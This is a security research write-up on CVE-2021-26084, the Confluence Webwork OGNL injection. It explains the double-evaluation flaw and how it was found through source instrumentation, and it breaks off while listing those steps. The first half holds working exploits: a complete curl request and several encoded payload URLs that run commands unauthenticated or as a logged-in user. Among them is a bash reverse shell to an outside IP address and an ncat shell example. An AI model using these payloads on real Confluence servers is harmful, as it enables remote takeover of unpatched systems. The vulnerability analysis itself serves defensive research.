
CVE-2021-26084 - Confluence Server Webwork OGNL injection
This write-up provides an overview of CVE-2021-26084 - Confluence Server Webwork OGNL injection [1] that would allow an authenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
Confluence Server / Data Center makes use of Webwork 2 MVC framework to process web requests and the view layer primarily consists of Velocity templates. A double evaluation is performed when velocity templates use Webwork tags with a value attribute that contains $. When a Webwork tag with a Value attribute that has a $ is encountered an initial evaluation happens in the parsing of Velocity template; this evaluated value is then passed to the Webwork tag which further evaluates the value as an OGNL expression. If the action class exposes a setter function for the parameter used in the value attribute then this parameter can be set from the URL by using URL params.. So by crafting a URL with an OGNL payload an attacker can perform remote code execution on the affected versions of the Confluence Server / Data Center.
# UnAuthenticated RCE - based on the awesome write-up at httpvoid; courtesy of Harsh Jaiswal(rootxharsh), Rahul Maini (iamnoooob) [8]
curl -i -s -k -X $'POST' -H $'Host: 127.0.0.1:8090' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 186' --data-binary $'linkCreation=a%5Cu0027%2B%23attr%5B%5Cu0022webwork.valueStack%5Cu0022%5D.findValue%28%5Cu0022%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0027xcalc%5Cu0027%29%5Cu0022%29%2B%5Cu0027' $'http://localhost:8090/pages/doenterpagevariables.action'
# UnAuthenticated RCE for Confluence < 7.12.14, Only if allow people to sign up to create their account' is enabled. COG > User Management > User Signup Options.
http://localhost:8090/signup.action?token=%5Cu0027%2B%28%23attr%5B%5Cu0022webwork.valueStack%5Cu0022%5D%29.%28findValue%28%5Cu0022%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu00
5C%5Cu0022xcalc%5Cu005C%5Cu0022%29%5Cu0022%29%29%2B%5Cu0027
# Authenticated RCE for Confluence < 7.12.14, a valid user account is required on the Confluence Server
http://localhost:8090/users/darkfeatures.action?featureKey=%5Cu0027%2B%28%23attr%5B%5Cu0022webwork.valueStack%5Cu0022%5D%29.%28findValue%28%5Cu0022%40java.lang.Runtime%40getRuntime%28
%29.exec%28%5Cu005C%5Cu0022xcalc%5Cu005C%5Cu0022%29%5Cu0022%29%29%2B%5Cu0027
# Authenticated RCE for for Confluence 7.12.14, the newSpaceKey parm is to be updated with the Space key of a space the user has Add Pages Permission
http://localhos:8090/pages/docreatepagefromtemplate.action?newSpaceKey=SAN&sourceTemplateId=uu%5Cu0027%2B%28%23attr%5B%5Cu0022webwork.valueStack%5Cu0022%5D%29.%28findValue%28%5Cu0022%
40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu005C%5Cu0022xcalc%5Cu005C%5Cu0022%29%5Cu0022%29%29%2B%5Cu0027
# The payload below spawns a reverse shell to a remote host running a netcat listener.BurpSuite addon Hackvertor tags has been used for readability and has to be converted accordingly
http://localhos:8090/pages/docreatepagefromtemplate.action?sourceTemplateId=oa<@urlencode_not_plus>\u0027+(#attr[\u0022webwork.valueStack\u0022]).(findValue(\u0022(#cmd=new
java.lang.String[]{\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027<@unicode_escapes>exec 5<>/dev/tcp/35.224.37.217/8021;cat <&5 | while read line; do $line 2>&5 >&5;
done<@/unicode_escapes>\u0027}).(@java.lang.Runtime@getRuntime().exec(#cmd))\u0022))+\u0027<@/urlencode_not_plus>
Expression Language injection vulnerabilities arise when an application incorporates user-controllable data into a string that is dynamically evaluated by a code interpreter. If the user data is not strictly validated, an attacker can use crafted input to modify the code to be executed, and inject arbitrary code that will be executed by the server [2]. Object-Graph Navigation Language (OGNL) [3] is an expression language for handling Java objects. When an OGNL injection vulnerability is present, it is possible for the attacker to inject OGNL expressions that can then be used to execute arbitrary Java code. In addition to property getting/setting, OGNL supports many more features, of which the below seems to be interesting from an exploit development view-point
Static method calling: @java.lang.Runtime@getRuntime()
Constructor calling: new java.lang.String[]{'/bin/bash','-c', ‘xcalc’}
Ability to work with context variables: #attr["webwork.valueStack"]
Method calling: #attr["webwork.valueStack"].findValue()
Combining the above constructs a valid OGNL expression may be formed. A typical OGNL expression is shown below:
@java.lang.Runtime@getRuntime().exec('ncat 203.0.113.5 8021 -e /bin/bash')
WebWork 2 is a pull based MVC framework built on top of a command pattern framework API called XWork and is the predecessor of the popular Apache Struts2. Confluence uses OpenSymphony's WebWork 2 to process web requests submitted by users. Webwork supports a powerful Expression Language based on OGNL for navigating its object stack(a.k.a ValueStack). It also supports multiple view technologies including JSP, FreeMarker, Velocity and also provides a rich tag library. “WebWork: Strutting the OpenSymphony way” by Mike Cannon-Brookes [4] provides an excellent overview of the Webwork 2 framework. Among other things that is of particular interest to this vulnerability is Webwork’s support for:
The detection of the vulnerability primarily involved a white box testing approach where source code instrumentation was used to analyze the OGNL evaluation. Following the excellent research of GHSL researcher Man Yue Mo on OGNL injection in Apache Struts [5] [6] [7] it has been noticed that the evaluateParams method of the UIBean class served as an interesting candidate. The code base of the webwork library in the Confluence Data Center(atlassian-confluence-x.y.z/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar) was extracted using JD GUI and was analysed for methods similar to evaluateParams. The closest match was protected void evaluateParams(OgnlValueStack stack) method in com.opensymphony.webwork.views.jsp.ui.AbstractUITag. Source code analysis further revealed that there exists a com.opensymphony.webwork.util.SafeExpressionUtil class that blocked the majority of the OGNL payloads.
As the author hardly had any expertise to run the Confluence Server through a debugger, primitive print statements were used to dump the results of the OGNL evaluation in the above classes. The steps involved in instrumenting the source code was: